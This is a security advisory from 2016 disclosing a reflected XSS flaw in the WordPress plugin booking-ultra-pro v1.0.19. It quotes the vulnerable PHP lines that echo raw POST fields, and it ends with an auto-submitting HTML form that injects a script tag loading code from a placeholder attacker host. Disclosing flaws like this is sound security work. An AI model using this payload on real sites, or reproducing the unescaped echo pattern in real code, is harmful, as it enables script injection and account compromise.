Advisory #: 1288
Title: Reflected XSS in wordpress plugin booking-ultra-pro v1.0.19
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/booking-ultra-pro
Downloads: 2068
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: booking-ultra-pro
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./booking-ultra-pro/admin/tabs/fields.php: 148: value="<?php if (isset($_POST['uultra_name']) && isset($this->errors) && count($this->errors)>0) echo $_POST['uultra_name']; ?>" 159: value="<?php if (isset($_POST['uultra_tooltip']) && isset($this->errors) && count($this->errors)>0) echo $_POST['uultra_tooltip']; ?>" 171: <textarea class="uultra-help-text" id="uultra_help_text" name="uultra_help_text" title="<?php _e('A help text can be useful for provide information about the field.','bookingup'); ?>" ><?php if (isset($_POST['uultra_help_text']) && isset($this->errors) && count($this->errors)>0) echo $_POST['uultra_help_text']; ?></textarea> The variables uultra_name, uultra_help_text appear to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./booking-ultra-pro/admin/tabs/fields.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/booking-ultra-pro/admin/tabs/fields.php method=post> <input type=hidden name=uultra_name value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>